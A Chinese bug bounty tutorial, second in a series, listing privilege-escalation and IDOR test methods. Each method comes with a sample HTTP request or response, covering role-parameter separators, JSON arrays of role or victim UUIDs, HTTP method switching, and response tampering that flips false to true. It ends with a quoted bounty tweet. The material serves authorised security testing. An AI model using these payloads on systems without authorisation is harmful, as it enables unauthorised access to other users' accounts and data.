漏洞赏金猎人系列-权限升级相关测试方法以及Tips-II

漏洞赏金猎人系列-权限升级相关测试方法以及Tips-II

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

前言

本文为权限升级相关系列的第二弹,前文有:

idor相关研究,

gitlab漏洞系列-access control相关小结

漏洞赏金猎人系列-权限升级相关测试方法以及Tips-I

正文

第八种方法

尝试使用分隔符，例如|，%20 或者，带角色的参数来获得权限升级

 
POST /privilege-escalation HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number

Role=admin,user

第九种方法

尝试更改Content-Type类型为application/json,并且插入uuid作为数组,例如:{"UUID":["victim-UUID","me-UUID"]}

 
POST /idor HTTP/1.1
Host: www.company.com User-Agent: Mozilla/5.0 
Content-Type: application/json 
Referer: https://previous.com/path 
Origin: https://www.company.com 
Content-Length: Number

{"UUID":["victim-UUID","me-UUID"]}

第十种方法

尝试更改Content-Type类型为application/json,并且以数组的形式插入角色值,比如{"Role":["admin","user"]} 会获得权限提升

 
POST /privilege-escalation HTTP/1.1 
Host: www.company.com User-Agent: Mozilla/5.0 
Content-Type: application/json 
Referer: https://previous.com/path 
Origin: https://www.company.com 
Content-Length: Number

{"Role":["admin","user"]}

第十一种方法

尝试将带有UUID参数的方法改为POST、GET、PUT或DELETE等。

GET /idor?uuid=Victim-UUID 
HTTP/1.1 Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com

第十二种方法

尝试将带有角色参数的方法改为POST、GET、PUT或DELETE等。

GET /privilege-escalation?Role=admin HTTP/1.1 
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com

第十三种方法

输入受害者UUID，然后尝试操作响应,比方说将原来响应中为错误的信息改为正确的,可能会绕过权限

 
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com 
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8 
Content-Length: length

{
"msg" : "Right To Do Next Action"
}

第十四种方法

尝试通过将false更改为true等响应中的操作来获得权限升级

 
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com 
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8 
Content-Length: length

{
"admin" : "true"
}

参考

Me and @XHackerx007
earned $7,500 for our submission 3 in 1 on@bugcrowd
#ItTakesACrowd#bugbountytip

Login Panel
On burp
inspected the response from the Login request
response was on my testing
like [{"param1":false,"param2":false,]etc..
changed the value false to true pic.twitter.com/gZT62emYie

— GodFather Orwa 🇯🇴 (@GodfatherOrwa) September 15, 2021